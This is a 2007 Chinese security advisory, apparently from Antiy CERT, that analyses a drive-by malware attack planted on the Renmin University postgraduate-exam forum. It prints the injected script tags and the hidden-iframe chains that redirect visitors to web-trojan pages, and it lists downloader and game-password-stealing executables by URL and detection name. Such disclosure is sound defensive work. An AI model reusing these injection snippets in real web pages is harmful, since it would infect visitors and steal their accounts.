人大考研论坛12月4日遭黑客挂马攻击
作者: 安天CERT, 出处:IT专家网, 责任编辑: 张帅,
2007-12-04 18:54
12月4日,人大考研论坛网站(http://www.rendaka****.cn)被黑客植入病毒,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序,盗取用户信息……
12月4日,人大考研论坛网站(http://www.rendaka****.cn)被黑客植入病毒,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序,盗取用户信息。
该网站的主页里被插入如下代码:
插入代码:
|
<script src=http://sns***.com/pic></script><script src=http://taoz****.com/pic></script> |
1. http://sns***.com/pic地址失效
2. http://zzs***.cn/reg 地址失效
3. http://taoz****.com/pic插入框架代码:
| document.write("<div style='display:none'>") document.write("<iframe src= http://51la.wss****.com/31/5xx.htm?3></iframe>") document.write("<iframe src= http://www.foa***.info/ms44.htm?6326></iframe>") document.write("<iframe src= http://aa.lls****.com/ww/new05.htm?067?4></iframe>") document.write("<iframe src= http://www.900***.info/xm30.htm?258></iframe>") document.write("<iframe src= http://www.taozh***.com/pic/vd.htm></iframe>") document.write("<iframe src=http://aa.llsg***.com/ww/new263.htm?id=015></iframe>") document.write("</div>") |
(1). http://51la.wss****.com/31/5xx.htm?3插入框架代码:
| <iframe src=http://qqq.wss****.com/gm.htm width=100 height=0></iframe> |
(1).http://qqq.wss****.com/gm.htm加密网马代码:
下载文件: http://qqq.aishe****.com/down.exe
(2).http://www.foa***.info/ms44.htm?6326框架代码:
| <iframe src="88/***.htm" width="20" height="0" frameborder="0"></iframe> <iframe src="88/***.htm" width="1" height="1" frameborder="0"></iframe> <iframe src="88/***.htm" width="100" height="0" frameborder="0"></iframe> |
(1).88/881.htm关键脚本代码:
| document.writeln("Cuteqq=\'http:\/\/60.190.101.***\/cd22.exe\';"); 下载文件: http://60.190.101.***/cd22.exe |
(2).88/***.htm加密网马代码:
(3).88/***.htm脚本代码:
| <script language=javascript src=bb.js></script> |
bb.js关键脚本代码:
| document.writeln("document.write (\'<iframe width=100 height=100 src=\"http:\/\/www.foa***.info\/88\/bf.htm\"><\/iframe>\');"); 连接地址为:http://www.foa***.info/88/bf.htm http://www.foa***.info/88/bf.htm加密网马代码 |
(3).http://aa.llsg****.com/ww/new05.htm?067?4框架代码:
| <iframe src=http://aa.lls****.com/aa/haha.htm width=5 height=5></iframe> <iframe src=http://aa.lls****.com/aa/pps.htm width=5 height=5></iframe> |
(1). http://aa.lls****.com/aa/haha.htm加密网马,
下载http://down.lls****.com/bb/014.exe
(2). http://aa.lls****.com/aa/pps.htm加密网马代码:
(4).http://www.900***.info/xm30.htm?258框架代码:
| <iframe src="ee/***.htm" width="20" height="0" frameborder="0"></iframe> <iframe src="ee/***.htm" width="0" height="0" frameborder="0"></iframe> <iframe src="ee/***.htm" width="100" height="0" frameborder="0"></iframe> |
(1).ee/ee1.htm关键脚本代码:
| document.writeln("Cuteqq=\'http:\/\/60.190.101.***\/cd22.exe\';"); 下载文件: http://60.190.101.***/cd22.exe |
(2).ee/ee3.htm加密网马代码:
(3).ee/***.htm脚本代码:
| <script language=javascript src=bb.js></script> |
bb.js关键脚本代码:
| document.writeln("document.write(\'<iframe width=100 height=100 src=\"http:\/\/www.900***.info\/ee\/bf.htm\"> <\/iframe>\'); |
连接地址为:http://www.900***.info/ee/bf.htm
http://www.900***.info/ee/bf.htm加密网马代码:
(5).http://aa.lls****.com/ww/new263.htm?id=015框架代码:
| <iframe src=http://aa.lls****.com/aa/haha.htm width=5 height=5></iframe> <iframe src=http://aa.lls****.com/aa/pps.htm width=5 height=5></iframe> |
(1). http://aa.lls****.com/aa/haha.htm
加密网马:下载http://down.lls****.com/bb/014.exe
(2). http://aa.lls****.com/aa/pps.htm加密网马代码:
当用户访问http://www.rendaka****.cn时, 会调用以上恶意代码!
使系统自动下载以下文件到本地,并运行:
| http://qqq.aishe****.com/down.exe 病毒名(Worm.Win32.Downloader.bw) 蠕虫下载者 http://60.190.101.***/cd22.exe 病毒名(Worm.Win32.Downloader.bi) 蠕虫下载者 http://down.lls****.com/bb/014.exe 病毒名(Worm.Win32.Downloader.as) 蠕虫下载者 下在成功运行木马将下载以下病毒到用户的系统,并运行。 http://67.43.156.**/down/0.exe 地址失效 http://67.43.156.**/down/1.exe 地址失效 http://67.43.156.**/down/2.exe 地址失效 http://67.43.156.**/down/3.exe 地址失效 http://67.43.156.**/down/4.exe 地址失效 http://67.43.156.**/down/5.exe 地址失效 http://67.43.156.**/down/6.exe 地址失效 http://67.43.156.**/down/7.exe 地址失效 http://205.209.142.***/down/8.exe 地址失效 http://205.209.142.***/down/9.exe 地址失效 http://205.209.142.***/down/10.exe 病毒名(Trojan-PSW.Win32.OnLineGames.jes) 盗号木马 http://205.209.142.***/down/11.exe 病毒名( Trojan-PSW.Win32.OnLineGames.jiz) 盗号木马 http://205.209.142.***/down/13.exe 病毒名( Trojan-PSW.Win32.OnLineGames.jgq) 盗号木马 http://205.209.142.***/down/14.exe 病毒名( Trojan-PSW.Win32.OnLineGames.jlc) 盗号木马 http://205.209.142.***/down/15.exe 地址失效 http://205.209.142.***/down/16.exe 病毒名( Trojan-PSW.Win32.OnLineGames.jes) 盗号木马 http://205.209.142.***/down/17.exe 病毒名( Trojan-PSW.Win32.OnLineGames.jer) 盗号木马 http://205.209.142.***/down/**.exe 病毒名( Virus.Win32.AutoRun.aii) 感染运行病毒 http://205.209.142.***/down/20.exe 地址失效 http://205.209.142.***/down/21.exe 地址失效 http://205.209.142.***/down/22.exe 地址失效 http://205.209.142.***/down/24.exe 地址失效 http://205.209.142.***/down/25.exe 地址失效 http://205.209.142.***/down/26.exe 地址失效 http://60.190.101.***/aa1.exe 病毒名( Trojan-PSW.Win32.OnLineGames.ixl) 盗号木马 http://60.190.101.***/aa2.exe 地址失效 http://60.190.101.***/aa3.exe 地址失效 http://60.190.101.***/aa4.exe 地址失效 http://60.190.101.***/aa5.exe 地址失效 http://60.190.101.***/aa6.exe 地址失效 http://60.190.101.***/aa7.exe 地址失效 http://60.190.101.***/aa8.exe 地址失效 http://60.190.101.***/aa9.exe 地址失效 http://60.190.101.***/aa10.exe 地址失效 http://60.190.101.***/aa11.exe 地址失效 http://60.190.101.***/aa12.exe 地址失效 http://60.190.101.***/aa13.exe 地址失效 http://60.190.101.***/aa14.exe 地址失效 http://60.190.101.***/aa15.exe 地址失效 http://60.190.101.***/aa16.exe 地址失效 http://60.190.101.***/aa17.exe 地址失效 http://60.190.101.***/aa**.exe 地址失效 http://60.190.101.***/aa19.exe 地址失效 http://60.190.101.***/aa20.exe 地址失效 http://60.190.101.***/aa21.exe 地址失效 http://60.190.101.***/aa22.exe 地址失效 http://60.190.101.***/aa23.exe 地址失效 http://60.190.101.***/aa24.exe 地址失效 http://60.190.101.***/aa25.exe 地址失效 http://qqq.dzy***.com/wm/wm/1.exe 病毒名( Trojan-Dropper.Win32.Small.bbz) 辅助木马 http://qqq.dzy***.com/wm/wm/2.exe 病毒名( Trojan-PSW.Win32.OnLineGames.jbj) 盗号木马 http://qqq.dzy***.com/wm/wm/3.exe 地址失效 http://qqq.dzy***.com/wm/wm/4.exe 病毒名( Trojan-PSW.Win32.OnLineGames.jfk) 盗号木马 http://qqq.dzy***.com/wm/wm/5.exe 病毒名( Trojan-PSW.Win32.OnLineGames.jjj) 盗号木马 http://qqq.dzy***.com/wm/wm/6.exe 病毒名( Trojan-PSW.Win32.OnLineGames.jbm) 盗号木马 http://qqq.dzy***.com/wm/wm/7.exe 病毒名( Trojan-PSW.Win32.Lmir.bpe) 盗号木马 http://qqq.dzy***.com/wm/wm/8.exe 病毒名( Trojan-PSW.Win32.OnLineGames.jmi) 盗号木马 http://qqq.dzy***.com/wm/wm/9.exe 病毒名( Trojan-PSW.Win32.OnLineGames.ixn) 盗号木马 http://qqq.dzy***.com/wm/wm/10.exe 地址失效 http://qqq.dzy***.com/wm/wm/11.exe 地址失效 http://qqq.dzy***.com/wm/wm/12.exe 地址失效 http://qqq.dzy***.com/wm/wm/13.exe 地址失效 http://qqq.dzy***.com/wm/wm/14.exe 地址失效 http://qqq.dzy***.com/wm/wm/15.exe 地址失效 http://qqq.dzy***.com/wm/wm/16.exe 地址失效 http://qqq.dzy***.com/wm/wm/17.exe 地址失效 http://qqq.dzy***.com/wm/wm/**.exe 地址失效 http://qqq.dzy***.com/wm/wm/19.exe 病毒名( Trojan-Downloader.Win32.Cryptic.ic) 下载者木马 http://qqq.dzy***.com/wm/wm/20.exe 地址失效 |
- 本文关键词:
